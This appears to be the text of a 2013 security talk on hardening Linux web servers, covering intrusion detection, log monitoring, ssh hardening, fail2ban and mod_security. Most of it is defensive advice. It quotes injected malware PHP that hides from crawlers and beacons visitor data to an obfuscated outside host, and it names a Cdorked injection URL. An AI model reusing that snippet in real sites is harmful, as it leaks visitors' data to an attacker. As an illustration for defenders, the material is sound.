Security tips and tricks, part 001

Tonimir Kiasondi, mag.inf, EUCIP Laboratory for Open Systems and Security Faculty of Organization and Informatics Varadin

#nmap -A tkisason.foi.hr
nmap scan report for tkisason.foi.hr Host is up (0.00033s latency). Not shown: 970 closed ports, 27 filtered ports PORT STATE SERVICE VERSION Security, Crypto, Open Systems kisasondi@gmail.com twitter: @kisasondi Skype:tkisason Open Systems and Security Lab Faculty of Organization and Informatics, Varadin

$ ls ~/talks/dorscluc2013
Don't talk about security, make a data science talk Crypto! HC security topic Let me just show some tips and tricks everyone should and can do

Security is associated with failure

We are definitely not winning Governments are trying to regulate with various laws, but they are not succeeding Groups that hack stuff for lulz are not helping

APT and other buzzwords

You work 8,10,12 hours a day Your attackers work 24/7 Half-life research - TTP (time-to-patch):
48 days to patch internal servers 19 days to patch external ones

Exposure You need to plug every hole in your system Your attackers only need to find one hole

Attack surface & loot

If you think you are not interesting for hackers, think again.
Your host can be used for: Launching DDoS Scanning / Exploit / Crimekit distribution Dump site / Phish site Spamming Bitcoin mining ...

Attack surface & loot

Tighten up your attack surface!
Do you really need that port/service/webapp in the open? Do i need that feature? Keep track of all your services/hosts/vm's/apps Review, Check and don't trust

Trends:
Automated scanners / script kiddie hack tools keep getting better and more effective
Remember there is a black market for that stuff

Script kiddies are actually trying to learn something. Watering hole exploits / Client side exploits.
Please, kill Java

Custom, targeted attacks

Contamination:
You spread your fail to other hosts. What happens when you are a little web dev company and you have 94 vhosts on a single machine.
Most are wordpress Most have misc (read: outdated) plugins A lot of custom PHP code (OWASP? What's that?) System isn't managed No security review/practice/vuln tracking No jailing / compartmentalization

Tip #1
Don't wait for a compromise to happen Set up your infrastructure early Prepare your system for the worst
Hardening / Security services Logging / Log mirroring Backups Be proactive (WAF, IDS, IPS, SIEM) Off site or offline config/source backups from a trusted source?

Example: Linux/Cdorked.A
Patched Apache, nginx, lighttpd binary
They also set the binary to be immutable Thanks!

No other "weird" files on disk Evil Apache loads some injections into requested pages:
http://894651446c103f0e.after1201.com

Targeting only vulnerable clients

Injection of custom code into your scripts Effectiveness raised, because only vulnerable clients get nabbed Smart enough to evade site crawlers / search engine bots

Tip #2
If you don't use rkhunter and chkrootkit... Start using an HIDS I like OSSEC:
File integrity checking (AIDE;debsums;rpm --verify) Log monitoring (petit / splunk / logstash) Rootkit detection (rkhunter / chkrootkit) Active response (fail2ban) No packaging :/

Useless if you don't monitor it's logs, use AnaLogi, use ANY log monitoring tool!

Failed password for root from 209.92.176.41 port 46864 ssh2 Failed password for root from 209.92.176.41 port 49866 ssh2 Failed password for root from 209.92.176.41 port 53300 ssh2 Failed password for root from 209.92.176.41 port 55774 ssh2 Failed password for root from 209.92.176.41 port 59157 ssh2 Failed password for root from 209.92.176.41 port 33723 ssh2

Tip #3
I don't even want to talk about password security Use ssh keys for remote login, disable password based auth and remote root logins in sshd.conf, use sudo for local root access. If you have a multiple user system, avoid contamination. A root pw od 123456 doesn't help! Watch out for file permissions!

Failed password for invalid user 2012eduworld2 from 83.212.118.74 port 58186 ssh2 Failed password for invalid user perfectpond. org from 83.212.118.74 port 59810 ssh2 Failed password for invalid user dna1admin from 83.212.118.74 port 51229 ssh2 Failed password for invalid user langliguo from 83.212.118.74 port 53687 ssh2 Failed password for invalid user bkalle from 83.212.118.74 port 58501 ssh2

Tip #4 - fail2ban / sshguard

Simple app On install protects openssh from online password cracking Your auth logs become readable! It can be extended to cover any log file fail2ban + mod_security

$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if ((strstr($sUserAgent, 'google') == false) AND (strstr($sUserAgent, 'yahoo') == false) AND (strstr($sUserAgent, 'baidu') == false) AND (strstr($sUserAgent, 'msn') == false) AND (strstr($sUserAgent, 'opera') == false) AND (strstr($sUserAgent, 'chrome') == false) AND (strstr($sUserAgent, 'bing') == false) AND (strstr($sUserAgent, 'safari') == false) AND (strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true AND isset ($_SERVER['HTTP_HOST']) == true) {

AND (strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true AND isset ($_SERVER['HTTP_HOST']) == true) { // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRG L3N0YXQucGhw').'?ip='.urlencode($_SERVER ['REMOTE_ADDR']).'&useragent='.urlencode ($sUserAgent).'&domainname='.urlencode($_SERVER ['HTTP_HOST']).'&fullpath='.urlencode($_SERVER ['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } }

Targeting
Attacks are getting more and more targeted Password reuse is the norm Attackers don't want to seed their exploit to a host that's not vulnerable Better evasion options Do you have HIDS / NIDS / SIEM? Train your people!

Good baselines:
NSA-IA Mitigation guidance:
http://www.nsa.gov/ia/mitigation_guidance/index.shtml

OWASP:
www.owasp.org

CIS Security benchmarks

https://benchmarks.cisecurity.org

www.google.com

webservers
Disable all http requests you don't use (TRACE, OPTIONS, HEAD...?)
Watch out!

Use mod_security LXC is easy, try to separate your services as much as possible
It does have some problems (iptables conntrack) They can be fixed easily

end rant
I hope this talk will be useful to you. Educate yourself and your users, at least that isn't difficult. Prepare your systems, harden them while you still can.

Questions?
twitter: @kisasondi

Thank you
twitter: @kisasondi